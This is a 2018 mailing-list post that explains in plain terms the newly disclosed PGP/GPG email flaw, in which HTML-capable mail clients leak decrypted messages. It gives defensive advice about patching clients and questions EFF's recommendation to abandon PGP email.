[RndTbl] PGP/GPG broken for email (S/MIME)

Trevor Cordes trevor at tecnopolis.ca
Mon May 14 23:24:08 CDT 2018


Nasty year for security 2018 is turning out to be.

Newly announced flaw in PGP/GPG when used for email that lets remote
hackers get copies of your encrypted emails (whether sender or
recipient).  Many (most?) email clients (MUAs) are not patched yet (but
the Linux ones should be shortly).

The encryption itself isn't broken, it's the way email clients and
their html parsers work that is being abused.  For the hack to work
you have to use a vulnerable email client that has builtin html
support (most do, but mine doesn't, yay!) and the attacker has to
intercept an encrypted email for/from you and then send it to you
wrapped in some naughty html.  Your email client then decrypts the
email and the naughty html promptly sends a copy to the attacker via
backchannels (getvars or similar in img tags hitting hacker servers).

To be clear, they can only use this hack to read emails they've already
intercepted and tricked you into opening in your HTML MUA.

If you use GPG from the command line you're basically safe.  It's still
good encryption (with a caveat about integrity checks that won't affect
most use cases).  GPG used for package signing, etc, is still safe.
GPG used for local file encryption is safe.

To be safe for email, update your MUA when it patches this, and ensure
all your contacts you PGP/GPG with do the same.  Unlike Spectre et al,
this one is fairly easy to fix assuming most people do it in a
reasonable amount of time (ya, I know).

Strangely, EFF recommends people phase our PGP/GPG email and have no
real recommended drop-in replacement.  I find this odd, as to me *some*
emails being hackable certainly beats *all* emails being hackable (i.e.
plaintext) which is basically what they are advocating.

Oh ya, this all could have been avoided if people stopped using HTML in
emails and HTML-capable MUAs.  <GRIN>

More information about the Roundtable mailing list